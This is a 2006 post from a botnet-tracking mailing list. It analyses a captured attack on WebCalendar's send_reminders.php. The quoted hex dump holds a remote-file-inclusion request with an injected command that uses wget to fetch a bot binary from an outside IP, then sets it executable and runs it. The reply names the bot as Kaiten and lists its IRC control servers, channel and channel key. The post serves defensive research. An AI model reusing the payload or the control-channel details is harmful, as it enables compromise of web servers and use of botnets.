Re: [botnets] web remote inclulde path

Jose Nazario Thu, 16 Mar 2006 20:22:08 -0800

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
On Fri, 17 Mar 2006, Jamie Riden wrote:


> 000 : 47 45 54 20 2F 77 65 62 63 61 6C 65 6E 64 61 72   GET /webcalendar
> 010 : 2F 73 65 6E 64 5F 72 65 6D 69 6E 64 65 72 73 2E   /send_reminders.
> 020 : 70 68 70 3F 69 6E 63 6C 75 64 65 64 69 72 3D 68   php?includedir=h
> 030 : 74 74 70 3A 2F 2F 38 33 2E 31 36 2E 31 38 37 2E   ttp://83.16.187.
> 040 : 36 2F 63 6D 64 2E 64 61 74 3F 26 63 6D 64 3D 63   6/cmd.dat?&cmd=c
> 050 : 64 25 32 30 2F 74 6D 70 3B 77 67 65 74 25 32 30   d%20/tmp;wget%20
> 060 : 38 33 2E 31 36 2E 31 38 37 2E 36 2F 68 61 69 74   83.16.187.6/hait
> 070 : 61 3B 63 68 6D 6F 64 25 32 30 37 34 34 25 32 30   a;chmod%20744%20
> 080 : 68 61 69 74 61 3B 2E 2F 68 61 69 74 61 3B 65 63   haita;./haita;ec
> 090 : 68 6F 25 32 30 59 59 59 3B 65 63 68 6F 7C 20 20   ho%20YYY;echo|
> 0a0 : 48 54 54 50 2F 31 2E 31 0A 48 6F 73 74 3A 20 32   HTTP/1.1.Host: 2
> 0b0 : 30 33 2E 31 31 34 2E 31 33 37 2E 39 0A 55 73 65   03.114.137.9.Use
> 0c0 : 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61   r-Agent: Mozilla
> 0d0 : 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65   /4.0 (compatible
> 0e0 : 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64   ; MSIE 6.0; Wind
> 0f0 : 6F 77 73 20 4E 54 20 35 2E 31 3B 29 0A 0A         ows NT 5.1;)..

it's a kaiten. here's the botnet info:

servers:
eu.undernet.org
us.undernet.org

channel:
#bubuli

channel key:
lipi

logging in with a checking tool reveals this:

SERVER us.undernet.org:
:[EMAIL PROTECTED] JOIN #bubuli
SERVER us.undernet.org: :mesa.az.us.undernet.org 353 NDAEMGIW * #bubuli
:GPQEF FOSR OCFLWIBC DFPE OOZGHG JQXSA HICKM HVNTE DPDU SNXU FWBMWFZA ZEKR
TRVT YOUWR VFEDE NOTM HMVLNEU NHSBVMN IJQLOMNV AVPBGZ ARMAW PIHBBSNR XDYTL
DEWDFG HEJPUD ZMHM EHZQK JIJXWTC DYWNKN OHWDSYCV DTOZSSZN EDWPIG RTMSXV
PGEQOJJ NEYUB UNVD JONSPMP ABNN VUHADKLP ICYOWYD EUVGLQ PRFSO FGOVKAU
NVMCSBZ TINUYYDT SYBDWGWI UNDDECNK DDQVMI TSDQ ZLJWMSU YOASU GXHDRD MJJUDA
RTXW CRJNTWWI EBVP LKVDHYH XETVMA MXBTBGTL ONBOOHN VNTWPZWE CPPO WJTSXT
VIJAWNVW


________
jose nazario, ph.d.                     [EMAIL PROTECTED]
http://monkey.org/~jose/                http://infosecdaily.net/
                                        http://www.wormblog.com/
_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

Re: [botnets] web remote inclulde path

Reply via email to